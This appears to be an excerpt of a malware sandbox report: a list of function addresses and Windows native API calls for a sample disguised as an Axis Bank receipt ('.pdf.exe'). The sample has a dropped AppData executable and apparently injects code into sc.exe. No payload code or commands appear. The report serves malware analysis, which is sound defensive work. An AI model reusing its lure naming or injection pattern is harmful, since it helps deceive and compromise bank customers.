Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CA0 NtQueryInformationToken,LdrInitializeThunk, 14_2_03542CA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035435C0 NtCreateMutant,LdrInitializeThunk, 14_2_035435C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035439B0 NtGetContextThread,LdrInitializeThunk, 14_2_035439B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542B80 NtQueryInformationFile, 14_2_03542B80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542AB0 NtWaitForSingleObject, 14_2_03542AB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F60 NtCreateProcessEx, 14_2_03542F60
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542F90 NtProtectVirtualMemory, 14_2_03542F90
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542FA0 NtQuerySection, 14_2_03542FA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542E30 NtWriteVirtualMemory, 14_2_03542E30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542EA0 NtAdjustPrivilegesToken, 14_2_03542EA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542D00 NtSetInformationFile, 14_2_03542D00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542DB0 NtEnumerateKey, 14_2_03542DB0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542C00 NtQueryInformationProcess, 14_2_03542C00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CC0 NtQueryVirtualMemory, 14_2_03542CC0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03542CF0 NtOpenProcess, 14_2_03542CF0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543010 NtOpenDirectoryObject, 14_2_03543010
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543090 NtSetValueKey, 14_2_03543090
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543D70 NtOpenThread, 14_2_03543D70
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03543D10 NtOpenProcessToken, 14_2_03543D10
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B586A0 NtClose, 14_2_02B586A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58620 NtDeleteFile, 14_2_02B58620
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B587D0 NtAllocateVirtualMemory, 14_2_02B587D0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58430 NtCreateFile, 14_2_02B58430
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B58560 NtReadFile, 14_2_02B58560
Detected potential crypto function
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_021CE5D4 0_2_021CE5D4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_021C4B01 0_2_021C4B01
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C1888 0_2_044C1888
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C1898 0_2_044C1898
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C3938 0_2_044C3938
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C1378 0_2_044C1378
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C1388 0_2_044C1388
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_044C7B8A 0_2_044C7B8A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AA0040 0_2_06AA0040
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AA5C54 0_2_06AA5C54
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAD940 0_2_06AAD940
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAE667 0_2_06AAE667
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAE670 0_2_06AAE670
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAF548 0_2_06AAF548
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAF113 0_2_06AAF113
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AA1F98 0_2_06AA1F98
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06AAF983 0_2_06AAF983
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E2A5F0 0_2_06E2A5F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E256E9 0_2_06E256E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E292C8 0_2_06E292C8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E20040 0_2_06E20040
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E2003B 0_2_06E2003B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 0_2_06E27008 0_2_06E27008
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_004010CE 10_2_004010CE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_004010D0 10_2_004010D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0042E0E3 10_2_0042E0E3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00403360 10_2_00403360
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00402B30 10_2_00402B30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0041146A 10_2_0041146A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00411473 10_2_00411473
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00417C1E 10_2_00417C1E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00417C23 10_2_00417C23
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00411693 10_2_00411693
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_0040F713 10_2_0040F713
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00402FEC 10_2_00402FEC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_004027F0 10_2_004027F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00402FF0 10_2_00402FF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B441A2 10_2_01B441A2
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B501AA 10_2_01B501AA
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B481CC 10_2_01B481CC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80100 10_2_01A80100
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2A118 10_2_01B2A118
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B18158 10_2_01B18158
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B503E6 10_2_01B503E6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E3F0 10_2_01A9E3F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4A352 10_2_01B4A352
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B102C0 10_2_01B102C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B50591 10_2_01B50591
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90535 10_2_01A90535
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3E4F6 10_2_01B3E4F6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34420 10_2_01B34420
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B42446 10_2_01B42446
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8C7C0 10_2_01A8C7C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90770 10_2_01A90770
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4750 10_2_01AB4750
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAC6E0 10_2_01AAC6E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A929A0 10_2_01A929A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B5A9A6 10_2_01B5A9A6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA6962 10_2_01AA6962
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A768B8 10_2_01A768B8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE8F0 10_2_01ABE8F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9A840 10_2_01A9A840
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A92840 10_2_01A92840
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B46BD7 10_2_01B46BD7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4AB40 10_2_01B4AB40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA8DBF 10_2_01AA8DBF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8ADE0 10_2_01A8ADE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9AD00 10_2_01A9AD00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2CD1F 10_2_01B2CD1F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30CB5 10_2_01B30CB5
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80CF2 10_2_01A80CF2
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90C00 10_2_01A90C00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0EFA0 10_2_01B0EFA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9CFE0 10_2_01A9CFE0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A82FC8 10_2_01A82FC8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B32F30 10_2_01B32F30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD2F28 10_2_01AD2F28
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB0F30 10_2_01AB0F30
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B04F40 10_2_01B04F40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4CE93 10_2_01B4CE93
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA2E90 10_2_01AA2E90
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4EEDB 10_2_01B4EEDB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4EE26 10_2_01B4EE26
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A90E59 10_2_01A90E59
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9B1B0 10_2_01A9B1B0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC516C 10_2_01AC516C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7F172 10_2_01A7F172
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B5B16B 10_2_01B5B16B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4F0E0 10_2_01B4F0E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B470E9 10_2_01B470E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A970C0 10_2_01A970C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3F0CC 10_2_01B3F0CC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD739A 10_2_01AD739A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4132D 10_2_01B4132D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7D34C 10_2_01A7D34C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A952A0 10_2_01A952A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B312ED 10_2_01B312ED
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAB2C0 10_2_01AAB2C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2D5B0 10_2_01B2D5B0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B595C3 10_2_01B595C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B47571 10_2_01B47571
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4F43F 10_2_01B4F43F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A81460 10_2_01A81460
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4F7B0 10_2_01B4F7B0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B416CC 10_2_01B416CC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD5630 10_2_01AD5630
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B25910 10_2_01B25910
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A99950 10_2_01A99950
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAB950 10_2_01AAB950
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A938E0 10_2_01A938E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFD800 10_2_01AFD800
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAFB80 10_2_01AAFB80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B05BF0 10_2_01B05BF0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ACDBF9 10_2_01ACDBF9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4FB76 10_2_01B4FB76
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD5AA0 10_2_01AD5AA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B31AA3 10_2_01B31AA3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2DAAC 10_2_01B2DAAC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3DAC6 10_2_01B3DAC6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B03A6C 10_2_01B03A6C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B47A46 10_2_01B47A46
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4FA49 10_2_01B4FA49
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAFDC0 10_2_01AAFDC0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B47D73 10_2_01B47D73
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A93D40 10_2_01A93D40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B41D5A 10_2_01B41D5A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4FCF2 10_2_01B4FCF2
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B09C32 10_2_01B09C32
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4FFB1 10_2_01B4FFB1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A91F92 10_2_01A91F92
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A53FD5 10_2_01A53FD5
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A53FD2 10_2_01A53FD2
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4FF09 10_2_01B4FF09
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A99EB0 10_2_01A99EB0
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_02E3E5D4 11_2_02E3E5D4
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA1388 11_2_04EA1388
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA1378 11_2_04EA1378
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA6ED0 11_2_04EA6ED0
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA1888 11_2_04EA1888
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA1898 11_2_04EA1898
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_04EA3A40 11_2_04EA3A40
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_0761A5F0 11_2_0761A5F0
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_0761E030 11_2_0761E030
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07616FF8 11_2_07616FF8
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_076156E9 11_2_076156E9
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_076192C8 11_2_076192C8
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07610040 11_2_07610040
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07610006 11_2_07610006
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_07617008 11_2_07617008
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Code function: 11_2_076198C8 11_2_076198C8
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CA352 14_2_035CA352
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0351E3F0 14_2_0351E3F0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035D03E6 14_2_035D03E6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B0274 14_2_035B0274
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035902C0 14_2_035902C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03598158 14_2_03598158
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035AA118 14_2_035AA118
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03500100 14_2_03500100
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C81CC 14_2_035C81CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035D01AA 14_2_035D01AA
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C41A2 14_2_035C41A2
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035A2000 14_2_035A2000
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03534750 14_2_03534750
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03510770 14_2_03510770
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0350C7C0 14_2_0350C7C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0352C6E0 14_2_0352C6E0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03510535 14_2_03510535
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035D0591 14_2_035D0591
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C2446 14_2_035C2446
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B4420 14_2_035B4420
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035BE4F6 14_2_035BE4F6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CAB40 14_2_035CAB40
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C6BD7 14_2_035C6BD7
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0350EA80 14_2_0350EA80
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03526962 14_2_03526962
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035129A0 14_2_035129A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035DA9A6 14_2_035DA9A6
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0351A840 14_2_0351A840
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03512840 14_2_03512840
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0353E8F0 14_2_0353E8F0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034F68B8 14_2_034F68B8
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03584F40 14_2_03584F40
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03530F30 14_2_03530F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B2F30 14_2_035B2F30
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03552F28 14_2_03552F28
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03502FC8 14_2_03502FC8
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0351CFE0 14_2_0351CFE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0358EFA0 14_2_0358EFA0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03510E59 14_2_03510E59
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CEE26 14_2_035CEE26
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CEEDB 14_2_035CEEDB
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03522E90 14_2_03522E90
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035CCE93 14_2_035CCE93
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035ACD1F 14_2_035ACD1F
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0351AD00 14_2_0351AD00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0350ADE0 14_2_0350ADE0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03528DBF 14_2_03528DBF
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03510C00 14_2_03510C00
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_03500CF2 14_2_03500CF2
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B0CB5 14_2_035B0CB5
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034FD34C 14_2_034FD34C
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C132D 14_2_035C132D
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0355739A 14_2_0355739A
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0352B2C0 14_2_0352B2C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035B12ED 14_2_035B12ED
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035152A0 14_2_035152A0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035DB16B 14_2_035DB16B
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0354516C 14_2_0354516C
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_034FF172 14_2_034FF172
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_0351B1B0 14_2_0351B1B0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035170C0 14_2_035170C0
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035BF0CC 14_2_035BF0CC
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_035C70E9 14_2_035C70E9
